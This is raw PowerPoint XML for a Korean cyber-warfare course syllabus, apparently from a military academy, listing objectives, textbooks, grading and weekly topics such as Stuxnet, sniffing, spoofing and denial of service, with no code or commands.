                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="857046656"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6082203">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2038668005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1252391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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교과목</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소개</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="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현대 사이버전의 개념을 이해하고 실무에서 사이버전 수행을 위한 기본능력을 배우는 과목이다</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>현대전에서 사이버전의 중요성을 인식하고 정보보안 소프트웨어를 활용한 실제 사이버전에서 수행되는 공격 및 방어기술을 학습한다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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1193396"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="877902">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교육목표</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사이버전에 대한 개념 이해 및 중요성 인식</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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정보보안 소프트웨어 실습을 통한 사이버전 수행을 위한 기본능력 구비</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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2943351"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1195520">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주교재 및</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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참고교재</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주교재</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b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>사이버전 개론</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>양서각</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3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>군 사관학교 교수일동</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참고교재 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>: 0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>의 끝없는 전쟁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인포더북스</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손영동</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="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8565554"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F354656A-3117-4843-95C0-A434A45A383A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="42354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295354445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F80C7EC-4675-437A-81A0-1A0D6E970216}"/>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4681754A-2693-4C28-A299-E5432694E657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>󰏮</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228854594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yber security concept Premium Vector">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D09DF66-D0B0-42FF-8655-B77E663ED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443038"/>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155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t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>목  차</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1730680524"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1970659"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2497152">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Intro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서론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Plan</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강의안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5237968"/>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Environ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도구</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4549051"/>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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Theory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Training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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Appendix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부록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349368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1" y="3152898"/>
            <a:ext cx="3853542"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(50%)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5507182" y="2268185"/>
            <a:ext cx="1760518"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(20%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693DB5F8-8FCA-4822-AAF1-273220AAA4D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7267700" y="3152894"/>
            <a:ext cx="958934" cy="132556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토의</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>(10%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D524D3C-E67B-4483-B251-B765D785B9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8226634" y="2268182"/>
            <a:ext cx="958934" cy="132556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과제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>(10%)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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39114554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 name="표 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F5DDF1-1DD2-4B55-A58A-301CFAC1474C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136159570"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="662998" y="259852"/>
          <a:ext cx="5196782" cy="6407649"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="731460">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3849756039"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1913277">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3643059982"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1913277">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1189105761"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="638768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2328329478"/>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2179210497"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415791">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이론</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정보보안의 정의와 사이버전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7141443"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415791">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실습체계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OT(</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사이버전 실습체계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7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6890124"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42572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2</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 사례</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해킹의 역사</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75</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기 졸업</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임관식</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(3.12.(</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6089501"/>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정보의표현</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디지털 데이터</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비트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바이트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이진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>진수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아스키 코드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확장자</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파일헤더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828482"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4260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3</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 사례</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주요 사이버 공격 및 사이버전 사례</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스턱스넷</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에스토니아</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 7.7DoS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>등</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>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020693"/>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운영체제</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운영체제</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운영체제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시스템 권한</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9710538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4</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 수행능력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각 나라별 사이버전 수행조직 및 능력</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우리나라 사이버전 수행조직 및 능력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802303"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="671624">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150" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="-150" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>사이버 보안 기본</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="-15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보안실무</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네트워크 보안 설정</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침해대응</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578377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5</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네트워크 기본 개념</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en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>OSI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>참조 모델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2084924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4613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실습 </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구조 데모</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핑</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경로 추적</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분석 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, Wireshark)</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31996796"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="278037">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="0" spc="-80">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>6</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sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>TCP/IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>프로토콜</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6161286"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="27803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기본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48950687"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39827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7</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기술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위협 단계별 분석</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기술 발전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7243461"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3982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심화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편집 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(vi) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>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2526012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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10" name="표 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDA8A94-7E03-4DCC-A59E-60323ED89FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312219396"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5974509" y="259853"/>
          <a:ext cx="5826967" cy="6407648"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="856368">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2079907277"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2098793">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1884598264"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2098793">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3374536937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="773013">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2076545781"/>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589692198"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="340414">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8</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[4. 19.(</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23.(</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800" b="1" kern="0" spc="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6119462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="42165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9</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네트워크위협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스니핑</a:t>
                      </a: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스푸핑</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홍보출장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>차</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(4.29(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)~30(</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1411112"/>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스니핑</a:t>
                      </a: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스푸핑</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 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APR, IP Spoofing</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73273933"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365870">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="10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네트워크위협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서비스 거부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
